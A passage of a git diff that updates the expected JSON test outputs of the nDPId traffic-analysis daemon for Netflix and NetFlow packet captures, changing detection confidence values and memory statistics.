+00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1872,"flow_first_seen":1484319091296,"flow_last_seen":1484319117694,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1734535,"flow_avg_l4_payload_len":926,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1484319032888,"flow_last_seen":1484319063911,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6835,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1484319033631,"flow_last_seen":1484319064012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10476,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1484319033943,"flow_last_seen":1484319064790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10490,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1484319064711,"flow_last_seen":1484319096924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24950,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319064683,"flow_last_seen":1484319064699,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","packets-captured":6999,"packets-processed":6999,"total-skipped-flows":0,"total-l4-payload-len":5686857,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":60,"total-detection-updates":52,"total-updates":0,"current-active-flows":0,"total-active-flows":61,"total-idle-flows":61,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":408,"global_ts_msec":1484319120726} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6999/6999 @@ -414,9 +414,9 @@ ~~ total active/idle flows...: 61/61 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6238433 bytes -~~ total memory freed........: 6238433 bytes -~~ total allocations/frees...: 125592/125592 +~~ total memory allocated....: 6372067 bytes +~~ total memory freed........: 6372067 bytes +~~ total allocations/frees...: 128354/128354 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 1482 chars diff --git a/test/results/netflow-fritz.pcap.out b/test/results/netflow-fritz.pcap.out index 61048b3d6..bccac0085 100644 --- a/test/results/netflow-fritz.pcap.out +++ b/test/results/netflow-fritz.pcap.out @@ -2,8 +2,8 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1498072707863} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1498072707863,"flow_last_seen":1498072707863,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1498072707863,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.1.1","src_port":23384,"dst_port":2055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1498072707863,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1498072707863,"pkt":"AAwRERERAAwRIiIiCABFKADQAABAAD8R1PvAqAABwKgBAVtYCAcAvAAAAAoAtFlKxZ0CWWXEAAQBAAACAHABzQAWAAEABIDPAAQAAGjygMz\/\/wAAaPKAzf\/\/AABo8gAHAAIACwACAAYAAgCxAAEAsAABALQAAgC1AAIAAgAEAM0AAgC5AAQAuAAEAAgABAAMAAQANgAEAFgAAgAEAAEAwAABgAH\/\/wAAaPIAAwA0AdIABwABAI8ABAApAAgAKgAIACgACAEwAAIBMQAEATIABAHTAAIAAQCOAAQAUv\/\/"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1498072707863,"flow_last_seen":1498072707863,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1498072707863,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.1.1","src_port":23384,"dst_port":2055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1498072707863,"flow_last_seen":1498072707863,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1498072707863,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.1.1","src_port":23384,"dst_port":2055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1498072707863,"flow_last_seen":1498072707863,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1498072707863,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.1.1","src_port":23384,"dst_port":2055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1498072707863,"flow_last_seen":1498072707863,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1498072707863,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.1.1","src_port":23384,"dst_port":2055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":180,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1498072707863} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869472 bytes -~~ total memory freed........: 5869472 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003106 bytes +~~ total memory freed........: 6003106 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 693 chars diff --git a/test/results/netflowv9.pcap.out b/test/results/netflowv9.pcap.out index 3262dc8cd..722001c3d 100644 --- a/test/results/netflowv9.pcap.out +++ b/test/results/netflowv9.pcap.out @@ -2,10 +2,10 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"netflowv9.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1568213026961} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568213026961,"flow_last_seen":1568213026961,"flow_idle_time":200000,"flow_min_l4_payload_len":1376,"flow_max_l4_payload_len":1376,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":1376,"midstream":0,"thread_ts_msec":1568213026961,"l3_proto":"ip4","src_ip":"192.168.2.134","dst_ip":"192.168.2.222","src_port":48629,"dst_port":2057,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02297{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1568213026961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1418,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1418,"pkt_l4_len":1384,"thread_ts_msec":1568213026961,"pkt":"ACWQ1Mz5rB9rrWosCABFAAV8LBZAAEARgqbAqAKGwKgC3r31CAkFaHVWAAkAECROCO5dZ6gMFm+miAAAAAEBAwQkAAoEJE1qKCRNaigAAAAAAAAAKAAAAAAAAAABBo0ou7J9QF7TxAskWgIAkwAAlYsAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJEzp1CRNjMsAAAAAAAUbtAAAAAAAAASjBhdDjcSK9gL7ko0BuxoAkwAAMhAAAFHMhHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJEzp3CRNjKAAAAAAAB2wnwAAAAAAAAZqBor2AvsXQ43EAbuSjRoAkwAAUcwAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1ybSRNcm0AAAAAAAAAKAAAAAAAAAABBoOfghRcdiVS2B5evAIAkwAAixYAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1rLyRNay8AAAAAAAAAKAAAAAAAAAABBor09llcdiVKtb1pkQIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2QhyRNkIcAAAAAAAAAKAAAAAAAAAABBor0qxxcdiVS2B5S8QIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2JWyRNiVsAAAAAAAAAKAAAAAAAAAABBoOfWVu53tNywXcEGgIAkwADMXgAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1qjSRNao0AAAAAAAAALAAAAAAAAAABBor2xOMr4aaiqY0AFgIAkwAAseAAADIQ2GfZGI\/ahHisFZ1CAAAAAAAgAAAAAAAAAAAAAAAAAAoEJE2OYCRNjmAAAAAAAAAAKAAAAAAAAAABBo1UlODIXai05wABvQIAkwAAS+UAADIQ2GfZGI\/ahHisFZ1CAAAAAAAgAAAAAAAAAAAAAAAAAAoEJE11kyRNdisAAAAAAAACRwAAAAAAAAAKBoG7\/klQ1h8GKsoBuxsAkwAAFSIAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE11kyRNdisAAAAAAAAWPwAAAAAAAAAIBlDWHwaBu\/5JAbsqyh4AkwAAMhAAABUihHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2HTSRNh00AAAAAAAAAKAAAAAAAAAABBor1FpC5r10bvgPWnAIAkwAAiv4AADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2Q4yRNkOMAAAAAAAAAKAAAAAAAAAABBoOfV4ZcdiVS2B5ZXgIAkwAAixYAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEAQIAVAAKBCRNhcskTYXLAAAAAAAAAHoAAAAAAAAAARHN+8cOjVQJ2YZdADUAkwAAMhAAAEB9hHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAQcA1AAKBiRNJ\/YkTYzBAAAAAAAAELEAAAAAAAAADwYgARa4LRoyANRG8rtzEZ1EIAFMoAAAAQMAAAAAgbv\/\/PfhAbvbAGwAACKxAAAyENhn2RiP2oR4rBWdQgAAAAAAAAAAAAAAAAAAAAAAAAoGJE0n9iRNjMEAAAAAAAAIZQAAAAAAAAAMBiABTKAAAAEDAAAAAIG7\/\/wgARa4LRoyANRG8rtzEZ1EAbv34RsAbAAAMhAAACKxhHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAA="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568213026961,"flow_last_seen":1568213026961,"flow_idle_time":200000,"flow_min_l4_payload_len":1376,"flow_max_l4_payload_len":1376,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":1376,"midstream":0,"thread_ts_msec":1568213026961,"l3_proto":"ip4","src_ip":"192.168.2.134","dst_ip":"192.168.2.222","src_port":48629,"dst_port":2057,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568213026961,"flow_last_seen":1568213026961,"flow_idle_time":200000,"flow_min_l4_payload_len":1376,"flow_max_l4_payload_len":1376,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":1376,"midstream":0,"thread_ts_msec":1568213026961,"l3_proto":"ip4","src_ip":"192.168.2.134","dst_ip":"192.168.2.222","src_port":48629,"dst_port":2057,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}} 02225{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1568213026961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1366,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1366,"pkt_l4_len":1332,"thread_ts_msec":1568213026961,"pkt":"ACWQ1Mz5rB9rrWosCABFAAVILBdAAEARgtnAqAKGwKgC3r31CAkFNLI1AAkAECROCO5dZ6gMFm+miQAAAAEBAwTEAAoEJE2HcCRNh3AAAAAAAAAAKAAAAAAAAAABBoOf7vm5sBu2oskXJAIAkwADHowAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2RayRNkWsAAAAAAAAAKAAAAAAAAAABBo0oBklcdiVS2B5jWQIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE10SSRNdEkAAAAAAAAAKAAAAAAAAAABBor2SWJcdiVKtb25AgIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE10KiRNdCoAAAAAAAAAKAAAAAAAAAABBoOfXsy5sBu2oskPGwIAkwADHowAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2NbCRNjWwAAAAAAAAAKAAAAAAAAAABBor1CjVZ+KxV434I\/gIAkwADFrkAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2HTiRNh2kAAAAAAAAArQAAAAAAAAACBhH8TA+K9gIpwNYUZxgAkwAAMhAAAALKhHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2HWyRNh1sAAAAAAAAAnQAAAAAAAAACBor2AikR\/EwPFGfA1hgAkwAAAsoAADIQ2GfZGI\/ahHisFZ1CAAAAAAACAAAAAAAAAAAAAAAAAAoEJE1ycCRNcnAAAAAAAAAAKAAAAAAAAAABBor0oRm5sBu2oskF8wIAkwADHowAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1qhiRNaoYAAAAAAAAAKAAAAAAAAAABBo1Umhq5r10JuVyC6gIAkwAAiv4AADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2KayRNin8AAAAAAAAAcwAAAAAAAAACBlCeJjiK9gKwnKIUZxgAkwAAMhAAAIUmhHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2KeiRNinoAAAAAAAAASwAAAAAAAAABBor2ArBQniY4FGecohgAkwAAhSYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1v8SRNb\/EAAAAAAAAAKAAAAAAAAAABBor0mjxcdiVS2B5xQQIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2M1CRNjNQAAAAAAAAAKAAAAAAAAAABBo0otfJcdiVS2B5oFAIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1yviRNcr4AAAAAAAAAKAAAAAAAAAABBor0xzO5sBu2oskgMwIAkwADHowAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1+PiRNfj4AAAAAAAAAKAAAAAAAAAABBor2SCBcdiVS2B5xvwIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAECAFQACgQkTYXUJE2F1AAAAAAAAAFBAAAAAAAAAAERjVQJ2c37xw4ANYZdAJMAAEB9AAAyENhn2RiP2oR4rBWdQgAAAAAAAAAAAAAAAAAAAAAAAA=="} 02298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1568213026961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1418,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1418,"pkt_l4_len":1384,"thread_ts_msec":1568213026961,"pkt":"ACWQ1Mz5rB9rrWosCABFAAV8LBhAAEARgqTAqAKGwKgC3r31CAkFaPcdAAkAECROCO5dZ6gMFm+migAAAAEBAwQkAAoEJE18UiRNfFIAAAAAAAAAKAAAAAAAAAABBor1GIyKxVabf\/8hYQIAkwAANu0AADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE188iRNfPIAAAAAAAAALAAAAAAAAAABBor1b6tTbs2s6Q\/qYQIAkwAAFQgAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE0b5CRNjsgAAAAAAAAD+QAAAAAAAAAKBtg6zy6Bu8nv4FQBux4AkwAAMhAAADtBhHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE0b7CRNjscAAAAAAAAH0wAAAAAAAAAIBoG7ye\/YOs8uAbvgVBoAkwAAO0EAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE13qiRNd6oAAAAAAAAAKAAAAAAAAAABBoG7U8O55eBgf\/8hYQIAkwAAodwAADIQ2GfZGI\/ahHisFZ1CAAAAAAAgAAAAAAAAAAAAAAAAAAoEJE2RLCRNkSwAAAAAAAAAKAAAAAAAAAABBoOfCHdcdiVS2B5lPQIAkwAAixYAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2C\/iRNhM0AAAAAAAAG0wAAAAAAAAAIBiOxkHGNVP4E02gBuxoAkwAAMhAAAEB9hHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2DFCRNhM0AAAAAAAATxgAAAAAAAAAJBo1U\/gQjsZBxAbvTaBoAkwAAQH0AADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE11DSRNdQ0AAAAAAAAALAAAAAAAAAABBor2Qvpdrl9qcVMffAIAkwADFrkAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2BfSRNgX0AAAAAAAAAKAAAAAAAAAABBo1UDOe5B+tq\/5UAUAIAkwAAISwAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1+qyRNfqsAAAAAAAAALAAAAAAAAAABBor1Lmtlbfp7vHIBvQIAkwAAXaEAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2AYyRNgGMAAAAAAAAAKAAAAAAAAAABBo1UHwVcdiVS2B5nAgIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1t3iRNbd4AAAAAAAAAKAAAAAAAAAABBoOfiSJcdiVKtb1noAIAkwAAixYAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEAQIAVAAKBCRNg0AkTYNAAAAAAAAAApoAAAAAAAAAARGDn7MEo6zlqFf+E8QAkwAAMkwAAzG32GfZGI\/ahHisFZ1CAAAAAAAgAAAAAAAAAAAAAAAAAQcA1AAKBiRNI9AkTYY5AAAAAAAAALUAAAAAAAAAAwYgAUygIAMBAAAAAAAAAAEzKgX1AAAQAQEAAAAAuT+RAcrSAbsRAGwAADIQAAA4TYR4rBWdQthn2RiP2gAAAAAAAAAAAAAAAAAAAAAAAAoGJE0j2SRNhkIAAAAAAAABGwAAAAAAAAAEBioF9QAAEAEBAAAAALk\/kQEgAUygIAMBAAAAAAAAAAEzAbvK0hkAbAAAOE0AADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAA="} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1568213026961,"flow_last_seen":1568213026962,"flow_idle_time":200000,"flow_min_l4_payload_len":1320,"flow_max_l4_payload_len":1376,"flow_tot_l4_payload_len":13468,"flow_avg_l4_payload_len":1346,"midstream":0,"thread_ts_msec":1568213026962,"l3_proto":"ip4","src_ip":"192.168.2.134","dst_ip":"192.168.2.222","src_port":48629,"dst_port":2057,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1568213026961,"flow_last_seen":1568213026962,"flow_idle_time":200000,"flow_min_l4_payload_len":1320,"flow_max_l4_payload_len":1376,"flow_tot_l4_payload_len":13468,"flow_avg_l4_payload_len":1346,"midstream":0,"thread_ts_msec":1568213026962,"l3_proto":"ip4","src_ip":"192.168.2.134","dst_ip":"192.168.2.222","src_port":48629,"dst_port":2057,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"netflowv9.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-payload-len":13468,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1568213026962} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 10/10 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 